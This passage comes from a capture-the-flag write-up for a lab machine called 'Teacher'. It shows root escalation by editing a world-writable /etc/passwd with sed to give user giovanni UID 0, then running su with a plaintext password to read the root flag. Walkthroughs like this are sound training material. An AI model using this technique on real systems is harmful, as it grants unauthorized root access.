giovanni@teacher:/etc$ ls -l passwd
-rwxrwxrwx 1 root root 1450 Jun 27  2018 passwd

We can now change the user id and gid of user giovanni

giovanni@teacher:~/work$ cat /etc/passwd | grep giovanni
giovanni:x:1000:1000:Giovanni,1337,,:/home/giovanni:/bin/bash
giovanni@teacher:~$ sed 's/giovanni:x:1000:1000:Giovanni,1337,,:\/home\/giovanni:\/bin\/bash/giovanni:x:0:0:Giovanni,1337,,:\/home\/giovanni:\/bin\/bash/' /etc/passwd > /tmp/passwd
giovanni@teacher:~$ cp /tmp/passwd /etc/passwd
giovanni@teacher:~$ cat /etc/passwd | grep giovanni
giovanni:x:0:0:Giovanni,1337,,:/home/giovanni:/bin/bash

Root flag

giovanni@teacher:~$ exit
logout
www-data@teacher:/var/www/html/moodle/question$ su - giovanni
Password: expelled

root@teacher:~# whoami root root@teacher:~# cat /root/root.txt <ROOT_FLAG>

References

Daniel Simao 20:28, 16 February 2020 (EST)